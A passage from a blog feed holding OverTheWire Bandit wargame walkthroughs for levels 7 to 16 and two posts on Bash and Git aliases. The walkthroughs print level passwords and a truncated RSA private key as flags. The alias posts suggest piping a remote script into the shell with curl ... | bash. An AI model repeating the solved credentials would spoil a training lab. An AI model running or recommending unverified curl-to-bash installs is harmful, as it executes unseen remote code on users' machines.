</code></pre><p>This command will provide detailed information about the services running on these ports.</p><h3 id="step-3-establishing-an-ssl-connection">Step 3: Establishing an SSL Connection</h3><p>Once we identify that port 31790 is open with an openSSL service running on it, we will use the <code>openssl</code> command to establish an SSL connection to that port:</p><pre><code>openssl s_client localhost:31790
</code></pre><p>This will initiate an SSL/TLS session, and the login flag for the next level will be displayed as an RSA key:</p><pre><code>-----BEGIN RSA PRIVATE KEY-----
MIIEogIBAAKCAQEAvmOkuifmMg6HL2YPIOjon6iWfbp7c3jx34YkYWqUH57SUdyJ
imZzeyGC0gtZPGujUSxiJSWI/oTqexh+cAMTSMlOJf7+BrJObArnxd9Y7YT2bRPQ
Ja6LLzb558YW3FZl87ORiO+rW4LCDCNd2lUvLE/GL2GWyuKN0K5iCd5TbtJzEkQTu
DSt2mcNn4rhAL+JFr56o4T6z8WWAW18BR6yGrMq7Q/kALHYW3OekePQAzL0VUYbW
JGTi65CxbCnzc/w4+mqQyvmzpWtMAzJTzAzQxNbkR2MBGySxDLrjg0LWN6sK7wNX
x0YVztz/zbIkPjfkU1jHS+9EbVNj+D1XFOJuaQIDAQABAoIBABagpxpM1aoLWfvD
KHcj10nqcoBc4oE11aFYQwik7xfW+24pRNuDE6SFthOar69jp5RlLwD1NhPx3iBl
J9nOM8OJ0VToum43UOS8YxF8WwhXriYGnc1sskbwpXOUDc9uX4+UESzH22P29ovd
d8WErY0gPxun8pbJLmxkAtWNhpMvfe0050vk9TL5wqbu9AlbssgTcCXkMQnPw9nC
YNN6DDP2lbcBrvgT9YCNL6C+ZKufD52yOQ9qOkwFTEQpjtF4uNtJom+asvlpmS8A
vLY9r60wYSvmZhNqBUrj7lyCtXMIu1kkd4w7F77k+DjHoAXyxcUp1DGL51sOmama
+TOWWgECgYEA8JtPxP0GRJ+IQkX262jM3dEIkza8ky5moIwUqYdsx0NxHgRRhORT
8c8hAuRBb2G82so8vUHk/fur85OEfc9TncnCY2crpoqsghifKLxrLgtT+qDpfZnx
SatLdt8GfQ85yA7hnWWJ2MxF3NaeSDm75Lsm+tBbAiyc9P2jGRNtMSkCgYEAypHd
HCctNi/FwjulhttFx/rHYKhLidZDFYeiE/v45bN4yFm8x7R/b0iE7KaszX+Exdvt
SghaTdcG0Knyw1bpJVyusavPzpaJMjdJ6tcFhVAbAjm7enCIvGCSx+X3l5SiWg0A
R57hJglezIiVjv3aGwHwvlZvtszK6zV6oXFAu0ECgYAbjo46T4hyP5tJi93V5HDi
Ttiek7xRVxUl+iU7rWkGAXFpMLFteQEsRr7PJ/lemmEY5eTDAFMLy9FL2m9oQWCg
R8VdwSk8r9FGLS+9aKcV5PI/WEKlwgXinB3OhYimtiG2Cg5JCqIZFHxD6MjEGOiu
L8ktHMPvodBwNsSBULpG0QKBgBAplTfC1HOnWiMGOU3KPwYWt0O6CdTkmJOmL8Ni
blh9elyZ9FsGxsgtRBXRsqXuz7wtsQAgLHxbdLq/ZJQ7YfzOKU4ZxEnabvXnvWkU
YOdjHdSOoKvDQNWu6ucyLRAWFuISeXw9a/9p7ftpxm0TSgyvmfLF2MIAEwyzRqaM
77pBAoGAMmjmIJdjp+Ez8duyn3ieo36yrttF5NSsJLAbxFpdlc1gvtGCWW+9Cq0b
dxviW8+TFVEBl1
</code></pre>]]></content:encoded></item><item><title><![CDATA[Unleashing Git Aliases: A Guide to Boosting Linux Productivity]]></title><description><![CDATA[One tool that stands out in the linux domain is the use of aliases, and when it comes to version control with Git, they become even more valuable.]]></description><link>https://artofcode.tech/unleashing-git-aliases-a-guide-to-boosting-linux-productivity</link><guid isPermaLink="false">Ghost__Post__656ab58377b408001b511c70</guid><category><![CDATA[software]]></category><category><![CDATA[blog]]></category><category><![CDATA[linux]]></category><category><![CDATA[alias]]></category><category><![CDATA[bash]]></category><category><![CDATA[gists]]></category><category><![CDATA[git]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 02 Dec 2023 04:43:55 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/roman-synkevych-UT8LMo-wlyk-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/roman-synkevych-UT8LMo-wlyk-unsplash.jpg" alt="Unleashing Git Aliases: A Guide to Boosting Linux Productivity"/><p>The command line is a powerful interface, and for Linux enthusiasts, mastering it can lead to increased productivity and a deeper understanding of the operating system. One tool that stands out in this journey is the use of aliases, and when it comes to version control with Git, they become even more valuable.</p><h2 id="why-use-aliases">Why Use Aliases?</h2><h3 id="1-simplify-commands">1. Simplify Commands</h3><p>In the world of Git, commands can be verbose and intricate. Enter aliases—your shortcut to simplicity. Instead of typing out <code>git status</code> every time, a quick <code>gs</code> can provide the same information. These shortcuts save time and make your commands more concise.</p><h3 id="2-increase-productivity">2. Increase Productivity</h3><p>Imagine a world where you spend less time typing and more time getting things done. Aliases make this a reality. Whether it's committing changes, checking the status, or pushing updates, using aliases can significantly boost your productivity.</p><h3 id="3-ease-of-memorization">3. Ease of Memorization</h3><p>Remembering a handful of aliases is much easier than recalling a multitude of lengthy commands. This not only makes your workflow smoother but also aids in mastering Git commands effortlessly.</p><h2 id="understanding-linux-better">Understanding Linux Better</h2><h3 id="1-command-familiarity">1. Command Familiarity</h3><p>Creating aliases requires an understanding of the commands you're shortening. As you craft aliases for Git, you naturally gain a deeper comprehension of version control concepts.</p><h3 id="2-customization-and-personalization">2. Customization and Personalization</h3><p>Linux is all about customization. Aliases allow you to personalize your command line, shaping it to fit your preferences. This customization journey enhances your understanding of the Linux environment.</p><h2 id="scripting-and-automation">Scripting and Automation</h2><h3 id="1-introduction-to-scripting">1. Introduction to Scripting</h3><p>Aliases act as a stepping stone to the world of scripting. As you become comfortable with creating simple shortcuts, you'll find yourself naturally progressing toward more advanced scripting.</p><h3 id="2-automating-repetitive-tasks">2. Automating Repetitive Tasks</h3><p>Git aliases can evolve into scripts that automate repetitive Git tasks. This transition from basic aliases to scripting demonstrates the true power of understanding and leveraging the command line.</p><h2 id="creating-git-aliases-by-using-a-bash-script">Creating Git Aliases by using a bash script</h2><p>To simplify the process of creating git aliases, we've prepared a Bash function that you can use right away. Just copy and paste this code snippet into your terminal:</p><pre><code>#!/bin/bash
add_git_aliases() {
local marker="# GIT ALIASES AUTOGENERATED"
local aliases_added=false
# Check if ~/.bashrc exists; if not, create it
if [ ! -e ~/.bashrc ]; then
touch ~/.bashrc
fi
# Check if the marker line already exists in ~/.bashrc
if grep -q "$marker" ~/.bashrc; then
echo "Git aliases marker already exists in ~/.bashrc. Skipping addition."
return
fi
# Append the marker line to ~/.bashrc
echo "$marker" >> ~/.bashrc
# Append the Git aliases to ~/.bashrc
cat <<EOL >> ~/.bashrc
# Basic Aliases
alias g='git'
alias ga='git add'
alias gc='git commit -m'
alias gs='git status'
alias gb='git branch'
alias gcheckout='git checkout'
alias gm='git merge'
alias gpull='git pull'
alias gpush='git push'
# Log and Show Aliases
alias gl='git log --oneline --graph --decorate --all'
alias gd='git diff'
alias gg='git grep'
# Stash Aliases
alias gstash='git stash'
# Remote Aliases
alias gremote='git remote'
# Interactive Rebase Aliases
alias grebase='git rebase'
# Git Configuration Aliases
alias gconfig-name='git config --global user.name "Your Name"'
alias gconfig-email='git config --global user.email "your.email@example.com"'
EOL
# Source ~/.bashrc to apply the changes
source ~/.bashrc
echo "Git aliases have been added to ~/.bashrc and sourced."
}
add_git_aliases
</code></pre><p>Instead of adding this function to your user profile you can just do <code>curl -L artofcode.tech/git-alias-generator | bash</code></p><p>If you're new to aliases, experiment with a few and witness the transformation in your Git workflow</p><p>Image Credit: <a href="https://unsplash.com/es/@synkevych">https://unsplash.com/es/@synkevych</a></p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 15→ Level 16]]></title><description><![CDATA[Welcome to another level of the OverTheWire Bandit challenges! In this level, we will continue our journey to enhance our Linux and ethical hacking skills.]]></description><link>https://artofcode.tech/bandit-level-15-level-16</link><guid isPermaLink="false">Ghost__Post__6568ca8a7893e2001b80f3c4</guid><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 30 Nov 2023 17:50:30 GMT</pubDate><media:content url="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/15.png" medium="image"/><content:encoded><![CDATA[<h2 id="introduction">Introduction</h2><img src="https://res-3.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/15.png" alt="Bandit Level 15→ Level 16"/><p>Welcome to another level of the OverTheWire Bandit challenges! In this level, we will continue our journey to enhance our Linux and ethical hacking skills.</p><h2 id="previous-flag">Previous Flag</h2><p>In the previous challenge, we successfully retrieved the flag:</p><p>Flag: <code>jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt</code></p><h3 id="scanning-for-open-ports">Scanning for Open Ports</h3><p>We will use the<code>nmap</code> command to scan for open ports on the local machine.</p><pre><code>nmap -p 30001 localhost
</code></pre><p>The output should indicate that port 30001 is open and that there is an openSSL service running on it.</p><h3 id="establishing-an-ssl-connection">Establishing an SSL Connection</h3><p>With port 30001 identified as an open port, let's establish an SSL connection using the <code>openssl</code> command:</p><pre><code>openssl s_client localhost:30001
</code></pre><p>This command initiates an SSL/TLS session and displays the flag for the next level.</p><p>Flag: <code>JQttfApK4SeyHwDlI9SXGR50qclOAil1</code></p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 14→ Level 15]]></title><description><![CDATA[We're back in the Bandit wargame, in this level where we'll deal with Secure Shell (SSH) and privilege escalation.]]></description><link>https://artofcode.tech/bandit-level-14-level-15</link><guid isPermaLink="false">Ghost__Post__65542d664a0815001b06756d</guid><category><![CDATA[ctf]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 15 Nov 2023 02:34:26 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/14.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction"><strong>Introduction</strong></h3><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/14.png" alt="Bandit Level 14→ Level 15"/><p>Greetings, folks! We're back in the Bandit wargame, in this level where we'll deal with Secure Shell (SSH) and privilege escalation.</p><h3 id="login-via-ssh">Login via SSH</h3><p>Now, let's set our sights on the previous flag and login as bandit14 with the password, <code>fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq</code>.</p><h3 id="scanning-the-environment"><strong>Scanning the Environment</strong></h3><p>Our initial step in the journey takes us into the domain of network exploration. By using the Nmap tool, we shall analyze the ports on our local host. Behold the command:</p><pre><code class="language-bash">nmap -p 30000 localhost
</code></pre><p>This command shows a telnet service running on port 30000.</p><h3 id="connecting-via-telnet"><strong>Connecting via Telnet</strong></h3><p>With the port 30000 revealed, it's time to establish a connection:</p><pre><code class="language-bash">telnet localhost 30000
</code></pre><p>After executing this command, the flag for the next level is printed in the output:</p><p>Flag: <code>jN2kgmIXJ6fShzhT2avhotn4Zcka6tnt</code></p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 13 → Level 14]]></title><description><![CDATA[Greetings, We're back with another step in the Bandit wargame journey. Level 13 introduces us to Secure Shell (SSH) and the concept of privilege escalation. Let's dive right into the details.]]></description><link>https://artofcode.tech/bandit-level-13-level-14</link><guid isPermaLink="false">Ghost__Post__6539d53530c3b3001bac339d</guid><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 26 Oct 2023 02:57:58 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/5.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/5.png" alt="Bandit Level 13 → Level 14"/><p>Greetings, We're back with another step in the Bandit wargame journey. Level 13 introduces us to Secure Shell (SSH) and the concept of privilege escalation. Let's dive right into the details.</p><h3 id="starting-point"><strong>Starting Point</strong></h3><p>Before we proceed, have the password from Level 12 handy: <code>wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw</code>.</p><h3 id="steps"><strong>Steps</strong></h3><p><strong>SSH Access with a Private Key</strong>: This time, you're using a private SSH key named <code>sshkey.private</code>. Let's get in:</p><pre><code class="language-bash">ssh -i sshkey.private bandit14@localhost -p 2220
</code></pre><p>This command establishes a secure connection with the key and the provided username and port.</p><p><strong>Retrieve the Flag</strong>: Once you're in, read the flag:</p><pre><code class="language-bash">cat /etc/bandit_pass/bandit14
</code></pre><p>By doing so, you will get the password for the next level:</p><pre><code>fGrHPx402xGC7U7rXKDaxiWFTOiF0ENq
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 12 → Level 13]]></title><description><![CDATA[Greetings, As we step into Level 12 of the Bandit wargame, we're faced with a unique challenge involving data manipulation and repeated compression. Get ready to roll up your sleeves and dive into the intricate world of command-line operations.]]></description><link>https://artofcode.tech/bandit-level-12-level-13</link><guid isPermaLink="false">Ghost__Post__653415271658fe001b791934</guid><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sat, 21 Oct 2023 18:17:07 GMT</pubDate><media:content url="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/asdf.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-4.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/asdf.png" alt="Bandit Level 12 → Level 13"/><p>Greetings, As we step into <strong>Level 12</strong> of the Bandit wargame, we're faced with a unique challenge involving data manipulation and repeated compression. Get ready to roll up your sleeves and dive into the intricate world of command-line operations.</p><h3 id="steps"><strong>Steps</strong></h3><p>Before we embark on our journey, make sure you've successfully acquired the password for the previous level: <code>JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv</code>.</p><p><strong>Creating a Workspace</strong>: Begin by creating a temporary directory named <code>/tmp/hexdump</code>. Navigate to this new directory using the following commands:</p><pre><code class="language-bash">mkdir /tmp/hexdump
cd /tmp/hexdump
</code></pre><p>This step ensures you have a clean workspace to carry out the tasks.</p><p><strong>Preparing the Data</strong>: Now, let's grab the <code>data.txt</code> file from the previous level and place it into your temporary directory:</p><pre><code class="language-bash">cp /home/bandit12/data.txt .
</code></pre><p>This sets the stage for our data manipulation journey.</p><p><strong>Decoding Hexdump</strong>: We'll start by converting the hexdump back to its original form. Execute the following commands to perform this transformation:</p><pre><code class="language-bash">xxd -r data.txt > hex
file hex
</code></pre><p>The <code>xxd -r</code> command reverses the hexdump, reconstructing the original data. The <code>file</code> command is used to inspect the type of data in the <code>hex</code> file.</p><p><strong>Compressing and Decompressing</strong>: In the next steps, we'll play with compression. These commands help us understand the data and its transformations:</p><pre><code class="language-bash">mv hex hex.gz
gunzip hex.gz
file hex
</code></pre><p>Here, we rename <code>hex</code> to <code>hex.gz</code>, then unzip it using <code>gunzip</code>. The <code>file</code> command confirms the type of data.</p><p><strong>Further Compression</strong>: Our exploration continues with more compression:</p><pre><code class="language-bash">mv hex hex.bz2
bunzip2 hex.bz2
file hex
</code></pre><p>We rename <code>hex</code> to <code>hex.bz2</code> and use <code>bunzip2</code> to decompress it. Once again, the <code>file</code> command provides insight into the data's nature.</p><p><strong>Final Steps</strong>: The puzzle nears its completion. Execute these commands to perform more decompression given the working file’s data type:</p><pre><code class="language-bash">mv hex hex.gz
gunzip hex.gz
file hex
tar -xf hex
file data5.bin
tar -xf data5.bin
file data6.bin
mv data6.bin data6.bin.bz2
bunzip2 data6.bin.bz2
file data6.bin
tar -xf data6.bin
file data8.bin
mv data8.bin data8.bin.gz
cat data8.bin
</code></pre><p>These commands navigate through decompression, untar, and finally, reveal the contents of <code>data8.bin</code> which is the password for the next level:</p><pre><code>wbWdlBxEir4CaE8LaPhauuOo6pwRmrDw
</code></pre>]]></content:encoded></item><item><title><![CDATA[Bandit Level 11 → Level 12]]></title><description><![CDATA[In Level 11 of the Bandit wargame, we're faced with a cryptographic challenge that requires some clever manipulation. Let's jump right into the steps to crack it.]]></description><link>https:/artofcode.tech/bandit-level-11-level-12</link><guid isPermaLink="false">Ghost__Post__651dafbb5e2d69001bc92629</guid><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[bandit]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 04 Oct 2023 18:34:53 GMT</pubDate><media:content url="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/12.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-5.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/12.png" alt="Bandit Level 11 → Level 12"/><p>In Level 11 of the Bandit wargame, we're faced with a cryptographic challenge that requires some clever manipulation. Let's jump right into the steps to crack it.</p><h3 id="steps-"><strong>Steps.</strong></h3><p><strong>Access the Remote Server</strong>: Open your terminal and connect to the remote server using this command:</p><pre><code class="language-bash">ssh bandit10@bandit.labs.overthewire.org -p 2220
</code></pre><p>Input the password from the previous level: <code>6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM</code>.</p><p><strong>Decrypt with <code>tr</code></strong>: Once connected, run this command to decrypt the data:</p><pre><code class="language-bash">cat data.txt | tr 'A-Za-z' 'N-ZA-Mn-za-m'
</code></pre><p>The <code>tr</code> command shifts each letter by 13 positions, revealing the concealed message.</p><p>The output of the command contains the password for the next level:</p><pre><code>JVNBBFSmZwKKOP0XbFXOoW8chDz5yVRv
</code></pre>]]></content:encoded></item><item><title><![CDATA[Unlocking Productivity and Linux Knowledge with Bash Aliases]]></title><description><![CDATA[In this blog post, we’ll explore how Bash aliases can speed up your daily tasks, enhance your understanding of Linux, and offer a handy snippet to simplify alias creation.]]></description><link>https://artofcode.tech/unlocking-productivity-and-linux-knowledge-with-bash-aliases</link><guid isPermaLink="false">Ghost__Post__6512c49932f76b001ba4f4da</guid><category><![CDATA[software]]></category><category><![CDATA[blog]]></category><category><![CDATA[linux]]></category><category><![CDATA[bash]]></category><category><![CDATA[gists]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 26 Sep 2023 12:04:49 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/gabriel-heinzer-4Mw7nkQDByk-unsplash.jpg" medium="image"/><content:encoded><![CDATA[<img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/gabriel-heinzer-4Mw7nkQDByk-unsplash.jpg" alt="Unlocking Productivity and Linux Knowledge with Bash Aliases"/><p/><p>In the world of command-line mastery, every keystroke counts. That's where Bash aliases come to the rescue, turbocharging your command-line efficiency and helping you dive deeper into the Linux ecosystem. In this blog post, we'll explore how Bash aliases can speed up your daily tasks, enhance your understanding of Linux, and offer a handy snippet to simplify alias creation.</p><h2 id="speeding-up-commands-with-aliases">Speeding Up Commands with Aliases</h2><p>Imagine a world where lengthy commands and directory paths are reduced to a few keystrokes. That's the power of Bash aliases. Aliases are shortcuts that can abbreviate complex commands, turning them into quick and easy one-liners.</p><p>For instance, instead of typing:</p><pre><code class="language-bash">cd /home/yourusername/Documents/some_folder
</code></pre><p>You can simply use an alias like:</p><pre><code class="language-bash">alias somefolder='cd /home/yourusername/Documents/some_folder'
</code></pre><p>With this alias, all you need is:</p><pre><code class="language-bash">somefolder
</code></pre><p>This is very useful, especially for repetitive tasks and frequently accessed directories.</p><h2 id="deepening-linux-knowledge">Deepening Linux Knowledge</h2><p>Aliases aren't just time-savers; they're your ticket to understanding Linux concepts on a deeper level. Here's how:</p><p><em>1. Mastering Directory Structures:</em> When you create aliases for your frequently visited directories, you naturally become more aware of the directory structure. You'll find yourself organizing your file system with more precision, creating logical folders, and navigating with ease.</p><p><em>2. Exploring User Profiles:</em> By customizing your Bash environment with aliases, you gain insights into user profiles. You'll learn how to tailor your command-line experience to suit your needs and preferences, a fundamental skill for any Linux user.</p><p><em>3. Embracing Bash Commands:</em> Alias creation isn't just about saving time; it's about understanding how Bash commands work. You'll delve into Bash scripting concepts, learning how to manipulate and optimize your shell environment.</p><h2 id="creating-aliases-the-easy-way">Creating Aliases the Easy Way</h2><p>The process of creating aliases is straightforward and can be managed through either <code>~/.bashrc</code> or <code>~/.bash_profile</code>. Here's a simple template:</p><pre><code class="language-bash">alias aliasname='yourcommand'
</code></pre><p>For example, let's say you frequently work with Git repositories located in various directories. You can create an alias like this:</p><pre><code class="language-bash">alias mygit='git -C /path/to/your/git/repo'
</code></pre><p>Now, you can use <code>mygit</code> instead of the full <code>git</code> command, and it will always operate in the specified repository.</p><h2 id="unlocking-efficiency-with-common-tasks">Unlocking Efficiency with Common Tasks</h2><p>While aliases are versatile, some tasks benefit immensely from their use:</p><p><em>1. Directory Navigation:</em> Simplify directory traversal with aliases for your most-used directories. No more typing out long paths – just type the alias, and you're there.</p><p><em>2. Git Commands:</em> Streamline your Git workflow by creating aliases for common Git operations like committing, pushing, and branching. Fewer keystrokes mean fewer chances for mistakes.</p><h2 id="bash-alias-creation-made-easy">Bash Alias Creation Made Easy</h2><p>To simplify the process of creating directory aliases, we've prepared a Bash function that you can use right away. Just copy and paste this code snippet into your terminal:</p><pre><code class="language-bash">create_alias() {
local dir_name="$(basename "$PWD")"
echo "alias $dir_name='cd \\\\"$PWD\\\\"'" >> ~/.bashrc
source ~/.bashrc
echo "Alias '$dir_name' added for current directory."
}
create_alias
</code></pre><p>This function automatically generates an alias based on your current directory and adds it to your <code>~/.bashrc</code> file. To create an alias, navigate to the desired directory and run the <code>create_alias</code> function.</p><p>Instead of adding this function to your user profile you can just do <code>curl -L artofcode.tech/alias-generator | bash</code></p><hr><p>By integrating Bash aliases into your Linux workflow, you'll save time, gain a deeper understanding of Linux principles, and optimize your daily tasks. It's a small step with significant benefits, and with our handy Bash function, you can start enhancing your command-line prowess today. Happy scripting!</p><p>Image Credit: <a href="https://unsplash.com/es/@6heinz3r">https://unsplash.com/es/@6heinz3r</a></p></hr>]]></content:encoded></item><item><title><![CDATA[Bandit Level 10 → Level 11]]></title><description><![CDATA[Bandit11 is the twelfth level of the OverTheWire Bandit wargame. In this level, we will learn how to decode base64 encoded data to retrieve the password for the next level.]]></description><link>https://artofcode.tech/bandit-level-10-level-11</link><guid isPermaLink="false">Ghost__Post__64d3df4669dee4001b1ffb93</guid><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Wed, 09 Aug 2023 18:52:42 GMT</pubDate><media:content url="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/11.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-1.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/11.png" alt="Bandit Level 10 → Level 11"/><p>Bandit11 is the twelfth level of the OverTheWire Bandit wargame. In this level, we will learn how to decode base64 encoded data to retrieve the password for the next level.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit10@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>You will be prompted to enter a password. Enter the password obtained from the previous level: <code>G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s</code> and hit enter.</li><li>You are now connected to the remote server and are able to execute commands.</li><li>To retrieve the password for the next level, enter the following command:</li></ol><pre><code>cat data.txt | base64 -d
</code></pre><ol><li>The output of the command is the password for the next level <code>6zPeziLdR2RKNdNYFNb6nVCKzphlXHBM</code>.</li></ol><p>Congratulations! You have successfully decoded the base64 encoded data and retrieved the password for Bandit12.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 9 → Level 10]]></title><description><![CDATA[Bandit10 is the eleventh level in the OverTheWire Bandit wargame. In this level, we are given a file named "data.txt" and we are required to find a string of text that occurs only once in the file and contains only letters and spaces.]]></description><link>https://artofcode.tech/bandit-level-9-level-10</link><guid isPermaLink="false">Ghost__Post__64cc1c3671f665001b722b4c</guid><category><![CDATA[ctf]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Thu, 03 Aug 2023 21:32:14 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/10.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/10.png" alt="Bandit Level 9 → Level 10"/><p>Bandit10 is the eleventh level in the OverTheWire Bandit wargame. In this level, we are given a file named "data.txt" and we are required to find a string of text that occurs only once in the file and contains only letters and spaces.</p><h3 id="steps">Steps</h3><p>Open your terminal application.</p><p>Enter the following command to ssh into the remote server using the credentials for Bandit9:</p><pre><code>ssh bandit9@bandit.labs.overthewire.org -p 2220
</code></pre><p>Enter the password for Bandit9 <code>EN632PlfYiZbn3PhVK3XOGSlNInNE00t</code> when prompted.</p><p>Once you are logged in, enter the following command to read the contents of the "data.txt" file:</p><pre><code>cat data.txt
</code></pre><p>You will see that the file contains a lot of random text.</p><p>Next, enter the following command to extract all the printable strings from the file:</p><pre><code>cat data.txt | strings
</code></pre><p>You will see that the output includes some text surrounded by multiple equal signs.</p><p>To filter out only the strings that contain letters and spaces and are surrounded by equal signs, enter the following command:</p><pre><code>cat data.txt | strings | grep '^=\\\\{2,\\\\}' | awk -F " " '{print $2}' | tr '\\\\n' ' ' | xargs echo
</code></pre><p>Let's break down this command:</p><ul><li><code>cat data.txt</code>: display the contents of the file <code>data.txt</code>.</li><li><code>strings</code>: extract human-readable strings from the binary file <code>data.txt</code>.</li><li><code>grep '^=\\{2,\\}'</code>: search for lines that start with two or more equal signs (<code>==</code>).</li><li><code>awk -F " " '{print $2}'</code>: print the second field of each matching line, which is the password.</li><li><code>tr '\\n' ' '</code>: replace the newline character with a space character.</li><li><code>xargs echo</code>: pass the output of the previous command to <code>echo</code>.</li></ul><p>After running the command, the password for the next level <code>G7w8LIi6J3kTb8A7j9LgrywtEUlyyp6s</code> will be displayed.</p><p>Congratulations! You have successfully completed Bandit10 and found the flag.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 8 → Level 9]]></title><description><![CDATA[Bandit9 is the tenth level of the OverTheWire Bandit wargame. In this level, we are given a file called data.txt and we have to find the line that occurs only once in the file.]]></description><link>https://artofcode.tech/bandit-level-8-level-9</link><guid isPermaLink="false">Ghost__Post__64c93243e23e16001b550df5</guid><category><![CDATA[ctf]]></category><category><![CDATA[bandit]]></category><category><![CDATA[overthewire]]></category><category><![CDATA[writeups]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Tue, 01 Aug 2023 16:30:25 GMT</pubDate><media:content url="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/9.png" medium="image"/><content:encoded><![CDATA[<h3 id="introduction">Introduction</h3><img src="https://res-2.cloudinary.com/hbig9cpoo/image/upload/q_auto/v1/ghost-blog-images/9.png" alt="Bandit Level 8 → Level 9"/><p>Bandit9 is the tenth level of the OverTheWire Bandit wargame. In this level, we are given a file called <code>data.txt</code> and we have to find the line that occurs only once in the file.</p><h3 id="steps">Steps</h3><ol><li>Open your terminal application.</li><li>Enter the following command to ssh into the remote server:</li></ol><pre><code>ssh bandit8@bandit.labs.overthewire.org -p 2220
</code></pre><ol><li>Enter the password for Bandit8: <code>z7WtoNQU2XfjmMtWA8u5rN4vzqu4v99S</code></li><li>Now, you are logged in as Bandit8 and can start solving the level.</li><li>Use the <code>cat</code> command to read the contents of the <code>data.txt</code> file:</li></ol><pre><code>cat data.txt
</code></pre><ol><li>We need to find the line that occurs only once in the file. To do this, we can use the <code>sort</code> command to sort the lines of the file, and then the <code>uniq -u</code> command to show only the lines that occur once:</li></ol><pre><code>cat data.txt | sort | uniq -u
</code></pre><p>Congratulations! You have successfully solved Bandit9 and obtained the password for the next level <code>EN632PlfYiZbn3PhVK3XOGSlNInNE00t</code>.</p><h3 id="conclusion">Conclusion</h3><p>In this level, we learned how to use the <code>sort</code> and <code>uniq</code> commands to find a unique line in a file. These are powerful commands that can be used to analyze and manipulate large amounts of data.</p>]]></content:encoded></item><item><title><![CDATA[Bandit Level 7 → Level 8]]></title><description><![CDATA[Bandit level 8 is all about finding a specific word in a file and extracting its value. In this level, we are given a file called data.txt and are tasked with finding the value of a specific word.]]></description><link>https://artofcode.tech/bandit-level-7-level-8</link><guid isPermaLink="false">Ghost__Post__64c5a7272d7509001b9261eb</guid><category><![CDATA[bandit]]></category><category><![CDATA[ctf]]></category><category><![CDATA[writeups]]></category><category><![CDATA[overthewire]]></category><dc:creator><![CDATA[Christian Páez]]></dc:creator><pubDate>Sun, 30 Jul 2023 00:03:57 GMT</pubDate><media:content 